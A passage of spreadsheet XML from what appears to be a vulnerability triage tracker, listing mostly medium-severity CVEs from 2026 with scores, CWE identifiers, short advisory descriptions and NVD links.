          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5482" s="5" t="inlineStr"/>
      <c r="K5482" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L5482" s="5" t="inlineStr">
        <is>
          <t>An
authenticated directory traversal vulnerability in file upload functionality has
been identified in Archer MR600 (v2, v3 &amp; v5) and TL-MR6400 v8. Due to insufficient validation of user-supplied file
information, an authenticated remote attacker with access to the affected
upload functionality could upload a specially crafted file and cause it to be
written outside the intended directory. 
Successful
exploitation could allow an authenticated remote attacker to write files to
unintended locations, potentially overwriting or modifying files
accessible to the affected service; arbitrary code execution has not
been demonstrated.</t>
        </is>
      </c>
      <c r="M5482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76652</t>
        </is>
      </c>
    </row>
    <row r="5483">
      <c r="A5483" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77506</t>
        </is>
      </c>
      <c r="C5483" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5483" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5483" s="5" t="inlineStr"/>
      <c r="F5483" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5483" s="5" t="inlineStr"/>
      <c r="H5483" s="5" t="inlineStr"/>
      <c r="I5483" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J5483" s="5" t="inlineStr"/>
      <c r="K5483" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5483" s="5" t="inlineStr">
        <is>
          <t>Znuny before LTS 6.5.22 allows AgentTicketEmailResend template XSS.</t>
        </is>
      </c>
      <c r="M5483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77506</t>
        </is>
      </c>
    </row>
    <row r="5484">
      <c r="A5484" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78560</t>
        </is>
      </c>
      <c r="C5484" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5484" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5484" s="5" t="inlineStr"/>
      <c r="F5484" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5484" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H5484" s="5" t="inlineStr"/>
      <c r="I5484" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5484" s="5" t="inlineStr"/>
      <c r="K5484" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L5484" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway includes an optional pass-through authentication source that accepts user identity from a client-supplied HTTP header without cryptographic validation. In architectures where this optional source is enabled without an upstream reverse proxy or firewall configured to sanitize and enforce client headers, an unauthenticated user can supply an arbitrary identity value to initiate a session.</t>
        </is>
      </c>
      <c r="M5484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78560</t>
        </is>
      </c>
    </row>
    <row r="5485">
      <c r="A5485" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79943</t>
        </is>
      </c>
      <c r="C5485" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5485" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5485" s="5" t="inlineStr"/>
      <c r="F5485" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5485" s="5" t="inlineStr"/>
      <c r="H5485" s="5" t="inlineStr"/>
      <c r="I5485" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5485" s="5" t="inlineStr"/>
      <c r="K5485" s="5" t="inlineStr">
        <is>
          <t>CWE-297</t>
        </is>
      </c>
      <c r="L5485"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protection mechanism bypass.</t>
        </is>
      </c>
      <c r="M5485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79943</t>
        </is>
      </c>
    </row>
    <row r="5486">
      <c r="A5486" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80437</t>
        </is>
      </c>
      <c r="C5486" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5486" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5486" s="5" t="inlineStr"/>
      <c r="F5486" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5486" s="5" t="inlineStr"/>
      <c r="H5486" s="5" t="inlineStr"/>
      <c r="I5486" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J5486" s="5" t="inlineStr"/>
      <c r="K5486" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="L5486" s="5" t="inlineStr">
        <is>
          <t>The Ninja Forms WordPress plugin from 3.14.10 before 3.15.2 does not prevent shortcodes in request-derived values from being executed when it substitutes them into content it later processes for shortcodes, allowing unauthenticated users to run any shortcode registered on the site.</t>
        </is>
      </c>
      <c r="M5486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80437</t>
        </is>
      </c>
    </row>
    <row r="5487">
      <c r="A5487" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80439</t>
        </is>
      </c>
      <c r="C5487" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5487" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5487" s="5" t="inlineStr"/>
      <c r="F5487" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5487" s="5" t="inlineStr"/>
      <c r="H5487" s="5" t="inlineStr"/>
      <c r="I5487" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J5487" s="5" t="inlineStr"/>
      <c r="K5487" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="L5487" s="5" t="inlineStr">
        <is>
          <t>The Redirection for Contact Form 7 WordPress plugin from 2.2.7 before 3.2.11 does not prevent shortcodes in submitted form values from being executed when it substitutes those values into an action's settings and then processes those settings for shortcodes, allowing unauthenticated users to run any shortcode registered on the site and read its output.</t>
        </is>
      </c>
      <c r="M5487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80439</t>
        </is>
      </c>
    </row>
    <row r="5488">
      <c r="A5488" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80440</t>
        </is>
      </c>
      <c r="C5488" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5488" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5488" s="5" t="inlineStr"/>
      <c r="F5488" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5488" s="5" t="inlineStr"/>
      <c r="H5488" s="5" t="inlineStr"/>
      <c r="I5488" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5488" s="5" t="inlineStr"/>
      <c r="K5488" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="L5488" s="5" t="inlineStr">
        <is>
          <t>The Hustle WordPress plugin before 7.8.14.2 does not prevent shortcodes in submitted form values from being executed when it substitutes those values into the message it returns after submission, because the guard it applies can be defeated by nesting, allowing unauthenticated users to run any shortcode registered on the site.</t>
        </is>
      </c>
      <c r="M5488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80440</t>
        </is>
      </c>
    </row>
    <row r="5489">
      <c r="A5489" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5489" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81167</t>
        </is>
      </c>
      <c r="C5489" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5489" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5489" s="5" t="inlineStr"/>
      <c r="F5489" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5489" s="5" t="inlineStr"/>
      <c r="H5489" s="5" t="inlineStr">
        <is>
          <t>address_suggestion_project:address_suggestion</t>
        </is>
      </c>
      <c r="I5489" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J5489" s="5" t="inlineStr"/>
      <c r="K5489" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5489" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ("Cross-site Scripting") vulnerability in Drupal Address Suggestion allows Cross-Site Scripting (XSS). This issue affects Address Suggestion versions: from 0.0.0 to 1.0.25.</t>
        </is>
      </c>
      <c r="M5489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81167</t>
        </is>
      </c>
    </row>
    <row r="5490">
      <c r="A5490" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5490" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84188</t>
        </is>
      </c>
      <c r="C5490" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5490" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5490" s="5" t="inlineStr"/>
      <c r="F5490" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5490" s="5" t="inlineStr"/>
      <c r="H5490" s="5" t="inlineStr"/>
      <c r="I5490" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J5490" s="5" t="inlineStr"/>
      <c r="K5490" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5490" s="5" t="inlineStr">
        <is>
          <t>LibreNMS versions &lt;= 26.4.0 contain a stored cross-site scripting vulnerability in the graph_descr.&lt;graphtype&gt; configuration settings, which are echoed verbatim without HTML escaping in includes/html/pages/graphs.inc.php. An administrator can store a malicious HTML payload that executes in the browser of any authenticated user who views the affected graph type. The issue is fixed in version 26.7.0.</t>
        </is>
      </c>
      <c r="M5490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84188</t>
        </is>
      </c>
    </row>
    <row r="5491">
      <c r="A5491" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5491" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84310</t>
        </is>
      </c>
      <c r="C5491" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5491" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5491" s="5" t="inlineStr"/>
      <c r="F5491" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5491" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H5491" s="5" t="inlineStr"/>
      <c r="I5491" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J5491" s="5" t="inlineStr"/>
      <c r="K5491" s="5" t="inlineStr">
        <is>
          <t>CWE-405, CWE-834</t>
        </is>
      </c>
      <c r="L5491" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.16.1, an attacker can craft a PDF that causes pypdf/_doc_common.py _get_outline to consume long runtimes and large amounts of memory when retrieving document outlines with large numbers of entries or deeply nested reused paths because the traversal lacked global entry-count and nesting-depth limits. This issue is fixed in version 6.16.1.</t>
        </is>
      </c>
      <c r="M5491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84310</t>
        </is>
      </c>
    </row>
    <row r="5492">
      <c r="A5492" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5492" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84311</t>
        </is>
      </c>
      <c r="C5492" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5492" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5492" s="5" t="inlineStr"/>
      <c r="F5492" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5492" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H5492" s="5" t="inlineStr"/>
      <c r="I5492" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J5492" s="5" t="inlineStr"/>
      <c r="K5492" s="5" t="inlineStr">
        <is>
          <t>CWE-834</t>
        </is>
      </c>
      <c r="L5492" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.16.1, an attacker can craft a PDF that causes pypdf/_page.py PageObject._extract_text and PageObject.extract_xform_text to traverse a directed acyclic graph of reused form XObjects in which each form invokes a child multiple times, creating exponentially many traversal paths and causing long runtimes and large memory consumption. This issue is fixed in version 6.16.1.</t>
        </is>
      </c>
      <c r="M5492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84311</t>
        </is>
      </c>
    </row>
    <row r="5493">
      <c r="A5493" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5493" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85541</t>
        </is>
      </c>
      <c r="C5493" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5493" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5493" s="5" t="inlineStr"/>
      <c r="F5493" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5493" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5493" s="5" t="inlineStr"/>
      <c r="I5493" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5493" s="5" t="inlineStr"/>
      <c r="K5493" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5493" s="5" t="inlineStr">
        <is>
          <t>DreamMaker developed by Interinfo has a Reflected Cross-site Scripting vulnerability. Authenticated remote attackers can execute arbitrary JavaScript codes in user's browser via a malicious website.</t>
        </is>
      </c>
      <c r="M5493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85541</t>
        </is>
      </c>
    </row>
    <row r="5494">
      <c r="A5494" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5494" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86257</t>
        </is>
      </c>
      <c r="C5494" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5494" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5494" s="5" t="inlineStr"/>
      <c r="F5494" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5494" s="5" t="inlineStr"/>
      <c r="H5494" s="5" t="inlineStr"/>
      <c r="I5494" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J5494" s="5" t="inlineStr"/>
      <c r="K5494" s="5" t="inlineStr">
        <is>
          <t>CWE-1236</t>
        </is>
      </c>
      <c r="L5494" s="5" t="inlineStr">
        <is>
          <t>wger before 2.6 fails to sanitize first_name and last_name fields in the gym member TSV export endpoint, allowing any gym member to inject spreadsheet formulas. Attackers can inject formulas like =HYPERLINK to exfiltrate admin data or execute code when admins open the exported file in Excel or LibreOffice Calc.</t>
        </is>
      </c>
      <c r="M5494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86257</t>
        </is>
      </c>
    </row>
    <row r="5495">
      <c r="A5495" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5495" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86423</t>
        </is>
      </c>
      <c r="C5495" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5495" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5495" s="5" t="inlineStr"/>
      <c r="F5495" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5495" s="5" t="inlineStr"/>
      <c r="H5495" s="5" t="inlineStr">
        <is>
          <t>imagemagick:imagemagick</t>
        </is>
      </c>
      <c r="I5495" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5495" s="5" t="inlineStr"/>
      <c r="K5495" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L5495" s="5" t="inlineStr">
        <is>
          <t>ImageMagick before 7.1.2-30 and 6.9.x before 6.9.13-55 contains a heap-use-after-free vulnerability in the GetList method of PerlMagick. A crafted call to the GetList method can trigger the use-after-free, resulting in a crash (denial of service).</t>
        </is>
      </c>
      <c r="M5495" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86423</t>
        </is>
      </c>
    </row>
    <row r="5496">
      <c r="A5496" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5496" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86425</t>
        </is>
      </c>
      <c r="C5496" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5496" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5496" s="5" t="inlineStr"/>
      <c r="F5496" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5496" s="5" t="inlineStr"/>
      <c r="H5496" s="5" t="inlineStr">
        <is>
          <t>imagemagick:imagemagick</t>
        </is>
      </c>
      <c r="I5496" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5496" s="5" t="inlineStr"/>
      <c r="K5496" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L5496" s="5" t="inlineStr">
        <is>
          <t>ImageMagick before 7.1.2-30 and 6.9.x before 6.9.13-55 contains a heap-use-after-free vulnerability in the Layer method of PerlMagick. An attacker who supplies a crafted list of images can trigger memory access after deallocation, resulting in a crash (denial of service).</t>
        </is>
      </c>
      <c r="M5496" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86425</t>
        </is>
      </c>
    </row>
    <row r="5497">
      <c r="A5497" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5497" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86813</t>
        </is>
      </c>
      <c r="C5497" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5497" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5497" s="5" t="inlineStr"/>
      <c r="F5497" s="5" t="inlineStr"/>
      <c r="G5497" s="5" t="inlineStr"/>
      <c r="H5497" s="5" t="inlineStr"/>
      <c r="I5497" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5497" s="5" t="inlineStr"/>
      <c r="K5497" s="5" t="inlineStr"/>
      <c r="L5497" s="5" t="inlineStr">
        <is>
          <t>The MetForm WordPress plugin before 4.1.9 does not properly neutralize newline characters in user-submitted values that are placed into notification email headers, allowing unauthenticated attackers to inject additional email headers, such as Bcc, into the emails the site sends when a submitted field value is configured to populate a header.</t>
        </is>
      </c>
      <c r="M5497" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86813</t>
        </is>
      </c>
    </row>
    <row r="5498">
      <c r="A5498" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5498" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87463</t>
        </is>
      </c>
      <c r="C5498" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5498" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5498" s="5" t="inlineStr"/>
      <c r="F5498" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5498" s="5" t="inlineStr"/>
      <c r="H5498" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I5498" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5498" s="5" t="inlineStr"/>
      <c r="K5498" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5498" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Certificate in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to potentially spoof address bar via crafted network traffic. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M5498" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87463</t>
        </is>
      </c>
    </row>
    <row r="5499">
      <c r="A5499" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5499" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87597</t>
        </is>
      </c>
      <c r="C5499" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5499" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5499" s="5" t="inlineStr"/>
      <c r="F5499" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5499" s="5" t="inlineStr"/>
      <c r="H5499" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I5499" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5499" s="5" t="inlineStr"/>
      <c r="K5499" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="L5499" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in CustomTabs in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to spoof address bar via a co-installed app. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M5499" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87597</t>
        </is>
      </c>
    </row>
    <row r="5500">
      <c r="A5500" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5500" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88038</t>
        </is>
      </c>
      <c r="C5500" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="D5500" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5500" s="5" t="inlineStr"/>
      <c r="F5500" s="5" t="inlineStr"/>
      <c r="G5500" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H5500" s="5" t="inlineStr"/>
      <c r="I5500" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5500" s="5" t="inlineStr"/>
      <c r="K5500" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="L5500" s="5" t="inlineStr">
        <is>
          <t>cookies is a Node.js library for reading and writing HTTP cookies, used by Koa via ctx.cookies. In versions before 0.9.2 the library validates the cookie name and value against character sets that reject the semicolon separator, but the domain and path options are checked only against a permissive RFC 7230 field-content matcher that allows semicolons, and both are written into the Set-Cookie header unescaped. An application that passes untrusted or request-derived data into the domain or path option can therefore inject additional cookie attributes, overriding SameSite, Secure, HttpOnly, or Domain on the cookies the application issues. This is a Set-Cookie attribute injection issue (CWE-74). The issue is fixed in cookies 0.9.2, which validates domain and path against RFC 6265 character sets. As a workaround, keep domain and path application-set rather than derived from untrusted input.</t>
        </is>
      </c>
      <c r="M5500" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88038</t>
        </is>
      </c>
    </row>
    <row r="5501">
      <c r="A5501" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5501" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18567</t>
        </is>
      </c>
      <c r="C5501" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D5501" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5501" s="5" t="inlineStr"/>
      <c r="F5501" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5501" s="5" t="inlineStr">
        <is>
          <t>ibm, db2</t>
        </is>
      </c>
      <c r="H5501" s="5" t="inlineStr">
        <is>
          <t>ibm:db2_mirror_for_i</t>
        </is>
      </c>
      <c r="I5501" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5501" s="5" t="inlineStr"/>
      <c r="K5501" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L5501" s="5" t="inlineStr">
        <is>
          <t>IBM Db2 Mirror for i 7.4, 7.5, and 7.6 could allow a local attacker to obtain information due to a race condition involving a predictable Unix domain socket path in a world-writable directory.</t>
        </is>
      </c>
      <c r="M5501" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18567</t>
        </is>
      </c>
    </row>
    <row r="5502">
      <c r="A5502" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5502" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19861</t>
        </is>
      </c>
      <c r="C5502" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D5502" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5502" s="5" t="inlineStr"/>
      <c r="F5502" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5502" s="5" t="inlineStr"/>
      <c r="H5502" s="5" t="inlineStr"/>
      <c r="I5502" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5502" s="5" t="inlineStr"/>
      <c r="K5502" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5502" s="5" t="inlineStr">
        <is>
          <t>The JetFormBuilder — Dynamic Blocks Form Builder WordPress plugin before 3.6.5.2 does not properly sanitise and escape a form field's value before including it in the HTML notification emails it sends, allowing unauthenticated users to inject arbitrary HTML into messages delivered to administrators and other recipients. Whether injected script executes depends on the recipient's mail client, but the injected markup is rendered regardless.</t>
        </is>
      </c>
      <c r="M5502" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19861</t>
        </is>
      </c>
    </row>
    <row r="5503">
      <c r="A5503" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5503" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-3096</t>
        </is>
      </c>
      <c r="C5503" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D5503" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5503" s="5" t="inlineStr"/>
      <c r="F5503" s="5" t="inlineStr"/>
      <c r="G5503" s="5" t="inlineStr"/>
      <c r="H5503" s="5" t="inlineStr"/>
      <c r="I5503" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5503" s="5" t="inlineStr"/>
      <c r="K5503" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-603</t>
        </is>
      </c>
      <c r="L5503" s="5" t="inlineStr">
        <is>
          <t>The product's web portals allow external links to be opened in a new browser tab. In certain configurations, the originating window retains access to the newly opened page, allowing interaction between the two browser contexts when navigating to external destinations.
This vulnerability could allow an attacker to manipulate the original trusted application window after a user clicks a malicious external link. This manipulation can lead to users being redirected to phishing pages, enabling credential theft, or facilitating other unauthorized actions within the context of the trusted site.</t>
        </is>
      </c>
      <c r="M5503" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-3096</t>
        </is>
      </c>
    </row>
    <row r="5504">
      <c r="A5504" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5504" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53636</t>
        </is>
      </c>
      <c r="C5504" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D5504" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5504" s="5" t="inlineStr"/>
      <c r="F5504" s="5" t="n">
        <v>0.002</v>
      </c>
